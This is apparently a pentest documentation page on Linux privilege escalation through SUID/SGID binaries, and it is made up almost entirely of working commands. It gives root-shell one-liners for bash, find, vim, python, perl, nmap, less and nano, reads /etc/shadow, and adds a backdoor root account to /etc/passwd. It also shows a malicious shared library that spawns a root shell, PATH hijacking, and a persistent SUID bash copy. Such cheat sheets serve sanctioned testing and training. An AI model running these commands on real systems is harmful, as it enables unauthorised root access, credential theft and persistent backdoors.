> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# SUID / SGID

> Privilege escalation via SUID and SGID binaries: discovery, GTFOBins, and custom SUID abuse.

## Overview

SUID (Set User ID) binaries run as the file owner. If owner is root → code runs as root regardless of who executes it.

SGID (Set Group ID) runs with the file's group permissions.

***

## Find SUID Binaries

```bash theme={"dark"}
find / -perm -4000 -type f 2>/dev/null
```

### Find SGID Binaries

```bash theme={"dark"}
find / -perm -2000 -type f 2>/dev/null
```

### Both

```bash theme={"dark"}
find / -perm /6000 -type f 2>/dev/null
```

***

## GTFOBins

Check every SUID binary against GTFOBins:

```bash theme={"dark"}
https://gtfobins.github.io/#+suid
```

***

## Common SUID Exploits

### bash

```bash theme={"dark"}
/bin/bash -p
```

`-p` preserves effective UID (root).

### find

```bash theme={"dark"}
find . -exec /bin/bash -p \;
```

### cp

Copy `/etc/shadow` or overwrite `/etc/passwd`:

```bash theme={"dark"}
# Read shadow
cp /etc/shadow /tmp/shadow

# Add root user to passwd
echo "backdoor:$(openssl passwd -1 password):0:0::/root:/bin/bash" >> /tmp/passwd
cp /tmp/passwd /etc/passwd
su backdoor
```

### vim / vi

```bash theme={"dark"}
vim -c ':!/bin/bash'
```

### python

```bash theme={"dark"}
python3 -c 'import os; os.execl("/bin/bash", "bash", "-p")'
```

### perl

```bash theme={"dark"}
perl -e 'exec "/bin/bash -p";'
```

### nmap (Old Versions)

```bash theme={"dark"}
nmap --interactive
!sh
```

Newer nmap:

```bash theme={"dark"}
echo 'os.execute("/bin/bash -p")' > /tmp/nse.nse
nmap --script=/tmp/nse.nse
```

### env

```bash theme={"dark"}
env /bin/bash -p
```

### less / more

```bash theme={"dark"}
less /etc/shadow
!/bin/bash
```

### nano

```bash theme={"dark"}
nano /etc/shadow
# Read contents, then Ctrl+R → Ctrl+X → command
reset; bash -p 1>&0 2>&0
```

***

## Custom SUID Binary

If you find unknown SUID binary, analyze it:

### Check What It Does

```bash theme={"dark"}
strings /path/to/suid-binary
ltrace /path/to/suid-binary
strace /path/to/suid-binary
```

### Shared Library Injection

Check for missing libraries:

```bash theme={"dark"}
ldd /path/to/suid-binary
```

If it loads from writable path:

```c theme={"dark"}
#include <stdlib.h>
#include <unistd.h>

void _init() {
    setuid(0);
    setgid(0);
    system("/bin/bash -p");
}
```

Compile:

```bash theme={"dark"}
gcc -shared -fPIC -nostartfiles -o /writable/path/lib.so exploit.c
```

### PATH Hijacking on SUID Binary

If SUID binary calls a command without full path (e.g., `system("cat /etc/shadow")`):

```bash theme={"dark"}
echo '/bin/bash -p' > /tmp/cat
chmod +x /tmp/cat
export PATH=/tmp:$PATH
/path/to/suid-binary
```

***

## Create SUID Binary (If Already Root)

Persistence:

```bash theme={"dark"}
cp /bin/bash /tmp/rootbash
chmod +s /tmp/rootbash
```

Later:

```bash theme={"dark"}
/tmp/rootbash -p
```
